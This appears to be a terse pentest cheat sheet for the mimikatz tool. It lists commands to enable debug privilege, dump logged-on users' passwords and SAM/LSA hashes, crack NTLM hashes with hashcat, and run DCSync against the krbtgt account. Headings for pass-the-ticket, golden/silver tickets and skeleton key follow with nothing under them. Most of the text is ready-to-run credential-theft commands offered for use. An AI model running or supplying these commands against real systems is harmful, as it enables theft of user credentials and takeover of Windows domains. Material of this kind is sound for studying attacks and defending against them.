mimikatz

.\mimikatz 'COMMAND' exit

check

privilege::debug
# Privilege '20' OK => Working properly

dump password / hashes

# dump logon users pass
sekurlsa::logonpasswords

# dump hashes
lsadump:sam
lsadump::lsa [/inject | /patch]
# hashcat -m 1000 <hash>

dcsync

lsadump::dcsync /user:krbtgt

elevate shell integrity

Pass-the-ticket

Golden / Silver Ticket

kerberos Skeleton Key

Last updated

Was this helpful?